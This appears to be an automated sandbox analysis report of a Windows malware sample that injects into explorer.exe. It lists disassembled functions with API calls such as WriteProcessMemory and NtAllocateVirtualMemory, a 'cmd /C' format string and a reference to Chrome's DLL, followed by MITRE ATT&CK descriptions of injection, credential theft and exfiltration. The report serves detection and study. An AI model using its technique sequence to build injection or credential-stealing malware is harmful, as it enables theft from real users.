API ID: HeapProcess$AllocateCodeCreateErrorExitFreeLastMultipleObjectsWaitmemset
String ID: cmd /C "%s> %s1"
API String ID: 3739062062-3818503316
Opcode ID: fd0ca77f585f957b9e0b81f93c04e6f5ef227b2c9c79a8d1acd0185f1a581a96
Instruction ID: fe5d1fd189de23931f05fc7268cf5fff0085b1ed3c65c2cd7d0d33d41c5f4bf2
Opcode Fuzzy Hash: fd0ca77f585f957b9e0b81f93c04e6f5ef227b2c9c79a8d1acd0185f1a581a96
Instruction Fuzzy Hash: FE11A035500118BFDF225F58CC01E9D3F29FB087A8F124011FA08AF264D7729E10ABD1

Uniqueness

Uniqueness Score: -1,00%

Function 01557038, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 0155707C
SetEvent.KERNEL32(?), ref: 015570B2

Strings

d, xrefs: 01557056

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: EventFreeHeap
String ID: d
API String ID: 2264064561-2564639436
Opcode ID: 62fa0d08eedb6ae53bf58ed64523710fdc039ce098a1e3271dccb4c1f6d63cb9
Instruction ID: 5c51e248c1d1f7cf25a4d625b14f06cfa5a18041d8d1d89d9957e11eb36f7b0a
Opcode Fuzzy Hash: 62fa0d08eedb6ae53bf58ed64523710fdc039ce098a1e3271dccb4c1f6d63cb9
Instruction Fuzzy Hash: 45114C78100705DFCB719F18D89085ABBF4FB083117810A2AED565B671D372A958DFA1

Uniqueness

Uniqueness Score: -1,00%

Function 0155F9DD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 0155F7A9: WriteProcessMemory.KERNEL32(000000FF,?,?,01598FD4,00000000,015934B0,00000018,0155FA0F,CHROME_CHILD.DLL,00000000,00000000), ref: 0155F7F1
Part of subcall function 0155F7A9: VirtualFree.KERNEL32(?,00000000,00008000), ref: 0155F808

RtlEnterCriticalSection.NTDLL(01599400), ref: 0155FA12
RtlLeaveCriticalSection.NTDLL(01599400), ref: 0155FA23

Part of subcall function 0154157B: HeapFree.KERNEL32(00000000,?,015606F9), ref: 01541587

Strings

CHROME_CHILD.DLL, xrefs: 0155F9F3

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CriticalFreeSection$EnterHeapLeaveMemoryProcessVirtualWrite
String ID: CHROME_CHILD.DLL
API String ID: 4046020822-4277025138
Opcode ID: f98a17adde2e923f7c0bccf01bbdb087d486e07060330b98c68a8d839aa2597f
Instruction ID: ae598a09b985fc10747abd271aa57ab31035d308a5dc6143f0d33871bd3f7bfe
Opcode Fuzzy Hash: f98a17adde2e923f7c0bccf01bbdb087d486e07060330b98c68a8d839aa2597f
Instruction Fuzzy Hash: 41018B35E01208AFDB10DFADC59499EB7F8FF45218B10406EDC00EB300D3709D058B91

Uniqueness

Uniqueness Score: -1,00%

Function 0154D3FB, Relevance: 5.3, APIs: 4, Instructions: 278COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000002,000001F8,?,?,?,-00000001), ref: 0154D462
memcpy.NTDLL(?,?,00000018,000001F8,?,?,?,-00000001), ref: 0154D64E

Part of subcall function 0154D2F0: memcpy.NTDLL(?,?,0000000C), ref: 0154D2FF

memcpy.NTDLL(?,?,00000018,000001F8,?,?,?,-00000001), ref: 0154D693
LocalFree.KERNEL32(00000002,000001F8,?,?,?,-00000001), ref: 0154D726

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memcpy$FreeLocal
String ID:
API String ID: 2365274387-0
Opcode ID: 42c505d1f8ff2f10de00c4d173699b60a7ae951e40fa69d81927fbcb3dba8d42
Instruction ID: 9ae65843747ff778b1fba82a17ceed7815cd17d9ab1ad59c2efb1194f5da467f
Opcode Fuzzy Hash: 42c505d1f8ff2f10de00c4d173699b60a7ae951e40fa69d81927fbcb3dba8d42
Instruction Fuzzy Hash: FAB17E71A0024AEFDF19CFA8C880AED7BF1FF58358F14856AE9099B250D734E955CB90

Uniqueness

Uniqueness Score: -1,00%

Function 01560E66, Relevance: 5.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 01560E8C

Part of subcall function 01560D8F: memset.NTDLL ref: 01560DB7
Part of subcall function 01560D8F: RtlGetVersion.NTDLL(?), ref: 01560DD0
Part of subcall function 01560D8F: GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 01560DDF
Part of subcall function 01560D8F: OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000), ref: 01560DED
Part of subcall function 01560D8F: CloseHandle.KERNEL32(00000000), ref: 01560E58

memcpy.NTDLL ref: 01560EB4

Part of subcall function 015618F0: NtAllocateVirtualMemory.NTDLL(01561006,00000000,00000000,01561006,00003000,00000040), ref: 01561921
Part of subcall function 015618F0: RtlNtStatusToDosError.NTDLL(00000000), ref: 01561928
Part of subcall function 015618F0: SetLastError.KERNEL32(00000000), ref: 0156192F

GetLastError.KERNEL32(00000010,00000218,0156CCFC,00000100,?,00000318,00000008), ref: 01560ECB
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0156CCFC,00000100), ref: 01560FAE

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Error$Last$Processmemset$AllocateCloseCurrentHandleMemoryOpenStatusVersionVirtualmemcpy
String ID:
API String ID: 3823122031-0
Opcode ID: 073e9e69e56aa0c752f030757cb9d150d6af2ab2d9a1b9fac79649a5626c35dd
Instruction ID: ae256970910152f52738cd6b2e4b62174ebdea798cdd5bb4e917682925917f9d
Opcode Fuzzy Hash: 073e9e69e56aa0c752f030757cb9d150d6af2ab2d9a1b9fac79649a5626c35dd
Instruction Fuzzy Hash: 15414EB1504702AFD761DF68CC41BABBBE9FB98310F00492DF5A9CB291E770D5158BA2

Uniqueness

Uniqueness Score: -1,00%

Function 0154F7FA, Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,0154F9CA,00000000,?,?,?,0154F9CA,?,?,?,?,?), ref: 0154F838
memcpy.NTDLL(?,?,?,?,?,?,?), ref: 0154F8BE
memcpy.NTDLL(?,03F4458B,00000000,?,?,?,?,?,?,?), ref: 0154F8F5
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0154F903

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memcpy$FreeLocal
String ID:
API String ID: 2365274387-0
Opcode ID: 28e0d247af99173142e7b24f5490d6f484ab6ae3d1f51c2a6080a5b8b018ed8f
Instruction ID: e71b2ae745df32177273da296312a042a84f859bb5f976c68bdb117548a7ec48
Opcode Fuzzy Hash: 28e0d247af99173142e7b24f5490d6f484ab6ae3d1f51c2a6080a5b8b018ed8f
Instruction Fuzzy Hash: 1A31DAB280021AAFEF11DF69DD8589F3FA8FF54264B054426FD14AB210E731DE609BE1

Uniqueness

Uniqueness Score: -1,00%

Function 01544E5B, Relevance: 5.1, APIs: 4, Instructions: 93memorystringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000000,?,00000000), ref: 01544E95

Part of subcall function 015445E6: memcpy.NTDLL(?,?,00000000,?,?,?,?,015445BA,00000001,?,00000000,?,00000001,00000000,00000000), ref: 01544602
Part of subcall function 015445E6: HeapFree.KERNEL32(00000000,?,?), ref: 01544619

lstrcmpi.KERNEL32(?,0159B29E), ref: 01544EDC
HeapFree.KERNEL32(00000000,00000000,?), ref: 01544F47
HeapFree.KERNEL32(00000000,?,00000000), ref: 01544F5F

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: FreeHeap$memcpy$lstrcmpi
String ID:
API String ID: 3676943305-0
Opcode ID: c0107e1088fc54c93b575196ca89e76d4ce0f30871943f4db833e5152be3246f
Instruction ID: c6453d7c3f1a0ecc72a312beed769fa4297d8a720bb5612be4d7889b8cbba865
Opcode Fuzzy Hash: c0107e1088fc54c93b575196ca89e76d4ce0f30871943f4db833e5152be3246f
Instruction Fuzzy Hash: A321E33164020ABFEB31AB68DC45FAE3B79FF55258F110024F924AF214C7709D09A7A0

Uniqueness

Uniqueness Score: -1,00%

Function 0156406F, Relevance: 5.1, APIs: 4, Instructions: 91stringmemoryCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32(?,0156E5D7), ref: 015640C6
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,01548C15,000000D0), ref: 015640E5
lstrcpyn.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01548C15), ref: 015640F4
LocalFree.KERNEL32(?), ref: 01564136

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Local$AllocFreelstrcmplstrcpyn
String ID:
API String ID: 1426976419-0
Opcode ID: be91253ff17fc8b6f003426b92bfa12f584b5fb89682ea04c0d86813e9649009
Instruction ID: e0f105ebbcba7754a6a06aa19e503e122de69aa452c311c970826cac88e31445
Opcode Fuzzy Hash: be91253ff17fc8b6f003426b92bfa12f584b5fb89682ea04c0d86813e9649009
Instruction Fuzzy Hash: A0216075600209EFEB228FADDC85AAF7FBDFF55260F154029E504DB150E770D940ABA0

Uniqueness

Uniqueness Score: -1,00%

Function 01550F45, Relevance: 5.1, APIs: 4, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,-00000002,80000001,01598164,0156E08C,?,?,01551156,?,80000001,01598164,00000000,?,000007FF,80000001), ref: 01550F73
memcpy.NTDLL(?,?,-000000FE,000007FF,80000001,00000000), ref: 01550F92
LocalAlloc.KERNEL32(00000040,0156E10C,?,?,?,000007FF,80000001,00000000), ref: 01550FAB
memcpy.NTDLL(00000004,?,00000000,00000000,0156EB2C,?,?,?,000007FF,80000001,00000000), ref: 01550FC6

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memcpy$AllocLocal
String ID:
API String ID: 2746370378-0
Opcode ID: ab63153ecbb4f9515cc6f395fb107877082a20abb2776d1e27eadcd4ba14e6c8
Instruction ID: 623ad3a75e90dc6308aec05b2222f2ff304ab9da84e078460b43cc54a9a32a63
Opcode Fuzzy Hash: ab63153ecbb4f9515cc6f395fb107877082a20abb2776d1e27eadcd4ba14e6c8
Instruction Fuzzy Hash: 2D219976B00581ABD721DBACCCC09AEBFA8FF4520071541AEDC55CF212E672EA05C3E1

Uniqueness

Uniqueness Score: -1,00%

Function 01550EF7, Relevance: 5.0, APIs: 4, Instructions: 29stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 01550F0A
LocalAlloc.KERNEL32(00000040,00000001), ref: 01550F14
lstrcpy.KERNEL32(00000000,?), ref: 01550F1E
LocalFree.KERNEL32(?), ref: 01550F39

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Local$AllocFreelstrcpylstrlen
String ID:
API String ID: 4200097308-0
Opcode ID: 27f301b12e08186d04a424eeb5b29345acd9a03f7931a88731651fa9bdc3060f
Instruction ID: eac79393181907f6f09fc0f43c837f1c416bb3fe80d6254153a7dde400f2f6b4
Opcode Fuzzy Hash: 27f301b12e08186d04a424eeb5b29345acd9a03f7931a88731651fa9bdc3060f
Instruction Fuzzy Hash: 55E03039502110BBE3626A695C0EB7F3A68FF81731F064415FD258E194C6344409DBB2

Uniqueness

Uniqueness Score: -1,00%

Description:	Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.
Tactics:	Execution
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd , which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task ).
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Credential Access, Persistence, Privilege Escalation
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, Scripting , PowerShell , or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Rootkits are programs that hide the existence of malware by intercepting (i.e., Hooking ) and modifying operating system API calls that supply system information. Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a Hypervisor , Master Boot Record, or the System Firmware .
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report rb5iJg6pgN.exe

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Cryptography:

Spreading:

Networking:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Behavior Graph

Simulations

Behavior and APIs

Antivirus and Machine Learning Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

User Modules

Description:	Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre